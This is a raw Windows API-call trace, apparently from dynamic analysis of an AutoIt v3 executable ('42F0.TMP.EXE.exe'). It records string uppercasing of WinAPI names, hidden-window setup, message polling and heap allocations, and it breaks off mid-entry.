CharUpperBuffW (in: lpsz="_WINAPI_PATHCOMMONPREFIX", cchLength=0x18 | out: lpsz="_WINAPI_PATHCOMMONPREFIX") returned 0x18 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHCOMPACTPATH", cchLength=0x17 | out: lpsz="_WINAPI_PATHCOMPACTPATH") returned 0x17 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHCOMPACTPATH", cchLength=0x17 | out: lpsz="_WINAPI_PATHCOMPACTPATH") returned 0x17 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHCOMPACTPATHEX", cchLength=0x19 | out: lpsz="_WINAPI_PATHCOMPACTPATHEX") returned 0x19 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHCOMPACTPATHEX", cchLength=0x19 | out: lpsz="_WINAPI_PATHCOMPACTPATHEX") returned 0x19 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHCREATEFROMURL", cchLength=0x19 | out: lpsz="_WINAPI_PATHCREATEFROMURL") returned 0x19 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHCREATEFROMURL", cchLength=0x19 | out: lpsz="_WINAPI_PATHCREATEFROMURL") returned 0x19 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHFINDEXTENSION", cchLength=0x19 | out: lpsz="_WINAPI_PATHFINDEXTENSION") returned 0x19 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHFINDEXTENSION", cchLength=0x19 | out: lpsz="_WINAPI_PATHFINDEXTENSION") returned 0x19 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHFINDFILENAME", cchLength=0x18 | out: lpsz="_WINAPI_PATHFINDFILENAME") returned 0x18 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHFINDFILENAME", cchLength=0x18 | out: lpsz="_WINAPI_PATHFINDFILENAME") returned 0x18 [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHFINDNEXTCOMPONENT", cchLength=0x1d | out: lpsz="_WINAPI_PATHFINDNEXTCOMPONENT") returned 0x1d [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHFINDNEXTCOMPONENT", cchLength=0x1d | out: lpsz="_WINAPI_PATHFINDNEXTCOMPONENT") returned 0x1d [0070.563] CharUpperBuffW (in: lpsz="_WINAPI_PATHFINDONPATH", cchLength=0x16 | out: lpsz="_WINAPI_PATHFINDONPATH") returned 0x16 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHFINDONPATH", cchLength=0x16 | out: lpsz="_WINAPI_PATHFINDONPATH") returned 0x16 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHGETARGS", cchLength=0x13 | out: lpsz="_WINAPI_PATHGETARGS") returned 0x13 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHGETARGS", cchLength=0x13 | out: lpsz="_WINAPI_PATHGETARGS") returned 0x13 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHGETCHARTYPE", cchLength=0x17 | out: lpsz="_WINAPI_PATHGETCHARTYPE") returned 0x17 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHGETCHARTYPE", cchLength=0x17 | out: lpsz="_WINAPI_PATHGETCHARTYPE") returned 0x17 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHGETDRIVENUMBER", cchLength=0x1a | out: lpsz="_WINAPI_PATHGETDRIVENUMBER") returned 0x1a [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHGETDRIVENUMBER", cchLength=0x1a | out: lpsz="_WINAPI_PATHGETDRIVENUMBER") returned 0x1a [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHISCONTENTTYPE", cchLength=0x19 | out: lpsz="_WINAPI_PATHISCONTENTTYPE") returned 0x19 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHISCONTENTTYPE", cchLength=0x19 | out: lpsz="_WINAPI_PATHISCONTENTTYPE") returned 0x19 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHISEXE", cchLength=0x11 | out: lpsz="_WINAPI_PATHISEXE") returned 0x11 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHISEXE", cchLength=0x11 | out: lpsz="_WINAPI_PATHISEXE") returned 0x11 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHISFILESPEC", cchLength=0x16 | out: lpsz="_WINAPI_PATHISFILESPEC") returned 0x16 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHISFILESPEC", cchLength=0x16 | out: lpsz="_WINAPI_PATHISFILESPEC") returned 0x16 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHISLFNFILESPEC", cchLength=0x19 | out: lpsz="_WINAPI_PATHISLFNFILESPEC") returned 0x19 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHISLFNFILESPEC", cchLength=0x19 | out: lpsz="_WINAPI_PATHISLFNFILESPEC") returned 0x19 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHISRELATIVE", cchLength=0x16 | out: lpsz="_WINAPI_PATHISRELATIVE") returned 0x16 [0070.564] CharUpperBuffW (in: lpsz="_WINAPI_PATHISRELATIVE", cchLength=0x16 | out: lpsz="_WINAPI_PATHISRELATIVE") returned 0x16 [0070.565] CharUpperBuffW (in: lpsz="_WINAPI_PATHISROOT", cchLength=0x12 | out: lpsz="_WINAPI_PATHISROOT") returned 0x12 [0070.565] CharUpperBuffW (in: lpsz="_WINAPI_PATHISROOT", cchLength=0x12 | out: lpsz="_WINAPI_PATHISROOT") returned 0x12 [0070.565] CharUpperBuffW (in: lpsz="_WINAPI_PATHISSAMEROOT", cchLength=0x16 | out: lpsz="_WINAPI_PATHISSAMEROOT") returned 0x16 [0070.565] CharUpperBuffW (in: lpsz="_WINAPI_PATHISSAMEROOT", cchLength=0x16 | out: lpsz="_WINAPI_PATHISSAMEROOT") returned 0x16 [0070.565] CharUpperBuffW (in: lpsz="_WINAPI_PATHISSYSTEMFOLDER", cchLength=0x1a | out: lpsz="_WINAPI_PATHISSYSTEMFOLDER") returned 0x1a [0070.565] CharUpperBuffW (in: lpsz="_WINAPI_PATHISSYSTEMFOLDER", cchLength=0x1a | out: lpsz="_WINAPI_PATHISSYSTEMFOLDER") returned 0x1a [0070.565] CharUpperBuffW (in: lpsz="_WINAPI_PATHISUNC", cchLength=0x11 | out: lpsz="_WINAPI_PATHISUNC") returned 0x11 [0070.565] CharUpperBuffW (in: lpsz="_WINAPI_PATHISUNC", cchLength=0x11 | out: lpsz="_WINAPI_PATHISUNC") returned 0x11 [0070.565] CharUpperBuffW (in: lpsz="_WINAPI_PATHISUNCSERVER", cchLength=0x17 | out: lpsz="_WINAPI_PATHISUNCSERVER") returned 0x17 [0070.565] CharUpperBuffW (in: lpsz="_WINAPI_PATHISUNCSERVER", cchLength=0x17 | out: lpsz="_WINAPI_PATHISUNCSERVER") returned 0x17 [0070.771] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", nBufferLength=0x7fff, lpBuffer=0x143fab0, lpFilePart=0x144fab4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", lpFilePart=0x144fab4*="42F0.TMP.EXE.exe") returned 0x28 [0070.771] GetSysColorBrush (nIndex=15) returned 0x100072 [0070.771] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0070.771] LoadIconW (hInstance=0x290000, lpIconName=0x63) returned 0x400db [0070.776] LoadIconW (hInstance=0x290000, lpIconName=0xa4) returned 0x0 [0070.776] LoadIconW (hInstance=0x290000, lpIconName=0xa2) returned 0x0 [0070.777] LoadImageW (hInst=0x290000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0xa006f [0070.778] RegisterClassExW (param_1=0x144fa8c) returned 0xc1a6 [0070.778] GetSysColorBrush (nIndex=15) returned 0x100072 [0070.778] RegisterClassExW (param_1=0x144fa30) returned 0xc1a7 [0070.778] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc08a [0070.778] InitCommonControlsEx (picce=0x144fa60) returned 1 [0070.800] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0x41ae948 [0070.823] LoadIconW (hInstance=0x290000, lpIconName=0xa9) returned 0xa0213 [0070.826] ImageList_ReplaceIcon (himl=0x41ae948, i=-1, hicon=0xa0213) returned 0 [0070.887] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0x290000, lpParam=0x0) returned 0x502d2 [0072.053] NtdllDefWindowProc_W (hWnd=0x502d2, Msg=0x24, wParam=0x0, lParam=0x144f644) returned 0x0 [0072.053] NtdllDefWindowProc_W (hWnd=0x502d2, Msg=0x81, wParam=0x0, lParam=0x144f638) returned 0x1 [0072.062] NtdllDefWindowProc_W (hWnd=0x502d2, Msg=0x83, wParam=0x0, lParam=0x144f624) returned 0x0 [0072.447] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0072.447] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc08a [0072.448] CreatePopupMenu () returned 0xd02b9 [0072.451] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x502d2, hMenu=0x1, hInstance=0x290000, lpParam=0x0) returned 0x902ca [0073.052] NtdllDefWindowProc_W (hWnd=0x502d2, Msg=0x210, wParam=0x10001, lParam=0x902ca) returned 0x0 [0073.052] ShowWindow (hWnd=0x502d2, nCmdShow=0) returned 0 [0073.052] ShowWindow (hWnd=0x502d2, nCmdShow=0) returned 0 [0073.052] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 1 [0073.053] TranslateMessage (lpMsg=0x144f9e4) returned 0 [0073.053] DispatchMessageW (lpMsg=0x144f9e4) returned 0x0 [0073.053] NtdllDefWindowProc_W (hWnd=0x502d2, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0073.053] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.053] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43602c8 [0073.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360250 [0073.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce048 [0073.053] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0073.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430afe0 [0073.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360220 [0073.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce2c8 [0073.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360220 | out: hHeap=0x1780000) returned 1 [0073.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b0f8 [0073.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360148 [0073.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360208 [0073.054] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce308 [0073.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360208 | out: hHeap=0x1780000) returned 1 [0073.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce308 | out: hHeap=0x1780000) returned 1 [0073.054] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b1c0 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360370 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce1f8 [0073.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360370 | out: hHeap=0x1780000) returned 1 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b058 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360310 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360190 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce368 [0073.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360190 | out: hHeap=0x1780000) returned 1 [0073.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce368 | out: hHeap=0x1780000) returned 1 [0073.054] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b0a8 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360208 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce3a8 [0073.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360208 | out: hHeap=0x1780000) returned 1 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b120 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360370 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360208 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce298 [0073.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360208 | out: hHeap=0x1780000) returned 1 [0073.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce298 | out: hHeap=0x1780000) returned 1 [0073.054] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430aec8 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360340 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce308 [0073.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360340 | out: hHeap=0x1780000) returned 1 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b030 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360160 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360208 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce3c8 [0073.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360208 | out: hHeap=0x1780000) returned 1 [0073.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce3c8 | out: hHeap=0x1780000) returned 1 [0073.055] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b2b0 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360190 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce2a8 [0073.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360190 | out: hHeap=0x1780000) returned 1 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b260 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43602f8 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360328 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce1e8 [0073.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360328 | out: hHeap=0x1780000) returned 1 [0073.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce1e8 | out: hHeap=0x1780000) returned 1 [0073.055] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b2d8 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360190 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce1e8 [0073.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360190 | out: hHeap=0x1780000) returned 1 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430ae00 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360130 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360208 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce228 [0073.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360208 | out: hHeap=0x1780000) returned 1 [0073.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce228 | out: hHeap=0x1780000) returned 1 [0073.055] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430ae78 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360388 [0073.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce398 [0073.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360388 | out: hHeap=0x1780000) returned 1 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430aea0 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360328 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43600e8 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce318 [0073.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43600e8 | out: hHeap=0x1780000) returned 1 [0073.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce318 | out: hHeap=0x1780000) returned 1 [0073.056] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430af40 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360190 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce2b8 [0073.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360190 | out: hHeap=0x1780000) returned 1 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b148 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360268 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360340 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce1d8 [0073.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360340 | out: hHeap=0x1780000) returned 1 [0073.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce1d8 | out: hHeap=0x1780000) returned 1 [0073.056] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b170 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360388 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce258 [0073.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360388 | out: hHeap=0x1780000) returned 1 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17ba2d8 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360340 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360388 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce208 [0073.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360388 | out: hHeap=0x1780000) returned 1 [0073.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce208 | out: hHeap=0x1780000) returned 1 [0073.056] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b198 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360388 [0073.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce3c8 [0073.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360388 | out: hHeap=0x1780000) returned 1 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b1e8 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43600e8 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360208 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce328 [0073.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360208 | out: hHeap=0x1780000) returned 1 [0073.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce328 | out: hHeap=0x1780000) returned 1 [0073.057] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b210 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360280 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce298 [0073.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360280 | out: hHeap=0x1780000) returned 1 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b5d0 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360118 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360190 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce278 [0073.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360190 | out: hHeap=0x1780000) returned 1 [0073.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce278 | out: hHeap=0x1780000) returned 1 [0073.057] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b760 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360190 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce2e8 [0073.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360190 | out: hHeap=0x1780000) returned 1 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b328 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360388 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360190 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce1d8 [0073.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360190 | out: hHeap=0x1780000) returned 1 [0073.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce1d8 | out: hHeap=0x1780000) returned 1 [0073.057] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b738 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360220 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce2d8 [0073.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360220 | out: hHeap=0x1780000) returned 1 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b508 [0073.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360208 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43603a0 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce3b8 [0073.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43603a0 | out: hHeap=0x1780000) returned 1 [0073.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce3b8 | out: hHeap=0x1780000) returned 1 [0073.058] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b6c0 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360220 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce2f8 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360280 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43603a0 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce3b8 [0073.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 